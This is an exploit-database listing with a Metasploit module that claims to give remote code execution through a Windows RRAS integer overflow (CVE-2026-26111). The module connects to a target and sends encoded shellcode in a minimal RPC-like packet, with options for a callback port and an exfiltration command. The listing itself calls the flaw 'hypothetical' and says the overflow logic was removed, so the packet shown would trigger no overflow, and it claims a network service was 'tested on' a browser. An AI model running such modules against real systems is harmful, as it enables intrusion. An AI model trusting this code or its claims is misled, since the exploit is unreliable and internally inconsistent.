Share
## https://sploitus.com/exploit?id=PACKETSTORM:218137
======================================================================================================================
| # Title : Windows RRAS Integer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://microsoft.com |
======================================================================================================================
[+] Summary : This Metasploit module simulates a remote exploitation attempt against a hypothetical integer overflow vulnerability in Windows RRAS,
which could lead to a heap-based overflow and potential remote code execution.
The module establishes a TCP connection to the target, constructs a simplified RPC-like packet containing encoded payload data, and sends it to the service.
It includes configurable options such as target host, port, callback port, and an optional command parameter for payload execution context.
The exploit logic is intentionally simplified, with removed unsafe or broken decoder and overflow mechanisms. Additional features like exfiltration handling are stubbed out for safety and stability.
The module also includes a basic connectivity check stub and uses standard Metasploit payload handling (payload.encoded) to generate shellcode.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
##
class MetasploitModule < Msf::Exploit::Remote
Rank = Msf::Exploit::Rank::Great
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows RRAS Integer Overflow RCE (CVE-2026-26111)',
'Description' => %q{
This module simulates exploitation of an integer overflow in RRAS leading to heap overflow.
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'References' => [
['CVE', '2026-26111'],
['MSKB', 'KB5084597']
],
'Platform' => 'win',
'Targets' => [
[ 'Windows 11 x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' => {
'RPORT' => 4444,
'WfsDelay' => 30
},
'Payload' => {
'Space' => 4096,
'BadChars' => "\x00"
},
'DefaultTarget' => 0,
'DisclosureDate' => '2026-03-22'
))
register_options([
Opt::RHOST(),
OptPort.new('CALLBACK_PORT', [true, 'Callback port', 4445]),
OptString.new('EXFIL_CMD', [true, 'Command', 'whoami'])
])
end
def generate_payload
payload.encoded
end
def build_packet(shellcode)
pkt = "\x05\x00"
pkt << "\x0b"
pkt << "\x00\x00\x00\x00"
pkt << [shellcode.length].pack('V')
pkt << shellcode
pkt
end
def exploit
print_status("Connecting to target #{rhost}:#{rport}...")
connect
shellcode = generate_payload
packet = build_packet(shellcode)
print_status("Sending payload (#{packet.length} bytes)...")
sock.put(packet)
handler
disconnect
end
def start_exfiltration_server
print_status("Exfiltration feature disabled in corrected version (logic stub).")
end
def check
print_status("Basic check not implemented (safe stub).")
Exploit::CheckCode::Unknown
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================